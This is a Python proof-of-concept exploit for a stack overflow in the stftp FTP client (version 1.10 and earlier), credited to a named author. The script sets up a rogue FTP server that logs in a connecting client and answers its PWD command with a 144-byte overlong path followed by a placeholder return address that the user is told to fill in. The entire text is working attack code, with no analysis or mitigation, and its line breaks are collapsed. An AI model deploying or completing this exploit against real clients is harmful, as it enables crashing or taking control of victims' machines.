#!/usr/bin/python # stftp <= 1.10 (PWD Response Stack Overflow) PoC # Tested on: OpenSuSE 11.1 x64 # Coding: sqlevil - sqlevil@hotmail.com # Viva Muslam Al-Barrak from socket import * class tcp: def __init__(self): self.s = socket(AF_INET, SOCK_STREAM) self.s.bind(("0.0.0.0",21)) def getnext(self): print ("Listening for connection ...\n") self.s.listen(1) c, addr = self.s.accept() print ("client is nOw cOnnected\n") return c def close(self): self.s.close(); class ftp: def exCommand(self, command): if (len(command)<80): print("S -> C: " + command) else: print("S -> C: " + command[0:80] + " ...") self.s.send(command+'\r\n') def getCommand(self, size=1024): ret = self.s.recv(size); if (len(ret)<80): print ("C -> S: " +ret) else: print ("C -> S: " +ret[0:80] + " ...") return ret def __init__(self, c): self.s=c def Banner(self, str="Hi There"): self.exCommand( "220 %s" % str) def Auth(self, str1="pwd please", str2="OK"): self.getCommand() self.exCommand( "331 %s" % str1) self.getCommand() self.exCommand( "230 %s" % str2) def PWD(self, path='/', str='"%s" is current directory.'): self.getCommand() self.exCommand( '257 %s' % str % path) def Reject(self): self.getCommand() self.exCommand( "230 ERR Type set to I.") def SYST(self): self.getCommand() self.exCommand( "215 UNIX Type: L8") def PORT(self): self.getCommand() self.exCommand( "200 PORT command successful.") def CWD(self): self.getCommand() self.exCommand( "250 CWD command successful.") def PASIV(self): self.getCommand() self.exCommand( "227 Entering Passive Mode (174,142,51,122,17,214).") def stftp(self): # TODO: Enter yOur desire address here retadd='abcdefghi' self.Banner() self.Auth() # This custom string is adjusted for x64 architeture self.PWD('x'*144+retadd) self.getCommand() t = tcp() try: f=ftp(t.getnext()) f.stftp() except: pass finally: t.close() print "by3 <<<"